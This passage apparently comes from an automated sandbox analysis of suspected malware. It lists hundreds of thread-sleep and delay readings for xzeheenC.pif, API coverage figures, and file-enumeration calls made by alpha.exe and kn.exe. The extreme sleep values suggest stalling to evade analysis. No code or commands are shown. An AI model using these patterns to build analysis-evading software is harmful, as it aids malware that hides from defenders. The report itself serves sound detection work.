              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595222
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595097
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594972
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594847
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594722
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594472
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594347
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594222
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594097
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593972
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593847
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599890
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599781
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599343
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599234
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599125
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599015
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598906
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598797
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598687
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598578
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598468
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598355
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598250
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598140
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598031
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597922
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597812
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597593
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597265
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597156
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597047
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596937
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596718
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596609
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596500
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596390
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596281
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596172
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596062
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595953
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595843
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595733
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595624
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595515
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595406
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595297
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595187
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595078
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594968
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594859
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594750
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594640
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599891
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599657
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599313
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599188
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599063
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598938
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598719
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598594
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598266
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598157
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598032
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597907
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597344
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596113
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594110
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 2404
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 7409
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8423
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1439
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1604
              Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8216
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 8.4 %
              Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
              Source: C:\Users\Public\alpha.exeAPI coverage: 9.5 %
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep count: 31 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -28592453314249787s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -600000s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4896Thread sleep count: 2404 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599888s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4896Thread sleep count: 7409 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599769s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599644s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599519s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599394s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599269s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599150s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -599034s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598909s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598784s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598659s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598534s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598409s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598284s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598159s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -598023s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597906s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597716s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597596s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597472s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597347s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597222s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -597097s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596972s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596847s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596722s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596597s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596472s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596347s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596222s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -596097s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595972s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595847s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595722s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595597s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595472s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595347s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595222s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -595097s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594972s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594847s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594722s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594472s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594347s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594222s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -594097s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -593972s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4788Thread sleep time: -593847s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -25825441703193356s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -600000s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599890s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 7148Thread sleep count: 8423 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599781s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599672s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599562s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 7148Thread sleep count: 1439 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599453s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599343s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599234s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599125s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -599015s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598906s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598797s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598687s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598578s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598468s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598355s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598250s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598140s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -598031s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597922s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597812s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597703s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597593s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597484s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597375s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597265s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597156s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -597047s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596937s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596828s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596718s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596609s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596500s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596390s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596281s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596172s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -596062s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595953s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595843s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595733s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595624s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595515s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595406s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595297s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595187s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -595078s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594968s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594859s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594750s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5372Thread sleep time: -594640s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep count: 32 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -29514790517935264s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -600000s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599891s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 3600Thread sleep count: 1604 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 3600Thread sleep count: 8216 > 30
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599782s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599657s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599547s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599438s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599313s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599188s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -599063s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598938s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598828s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598719s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598594s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598484s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598375s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598266s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598157s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -598032s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597907s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597782s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597672s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597562s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597453s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597344s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -597110s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -596113s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -595110s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594985s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594860s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594735s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594610s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594485s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594360s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594235s >= -30000s
              Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 5900Thread sleep time: -594110s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7AB1235B8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D7B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF792D7B3D8
